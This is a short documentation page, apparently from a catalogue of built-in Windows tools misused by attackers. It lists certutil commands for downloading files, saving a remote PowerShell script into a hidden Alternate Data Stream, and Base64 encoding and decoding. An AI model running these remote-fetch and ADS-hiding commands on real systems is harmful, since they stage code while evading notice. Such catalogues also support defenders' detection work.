Skip to content

Latest commit

 

History

History
26 lines (18 loc) · 874 Bytes

certutil.exe.md

File metadata and controls

26 lines (18 loc) · 874 Bytes

Certutil.exe

  • Functions: Download, Add ADS, Decode, Encode

certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe
Download and save 7zip to disk in the current folder.

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt
Download and save a PS1 file to an Alternate Data Stream (ADS).

certutil -encode inputFileName encodedOutputFileName
certutil -decode encodedInputFileName decodedOutputFileName

Commands to encode and decode a file using Base64.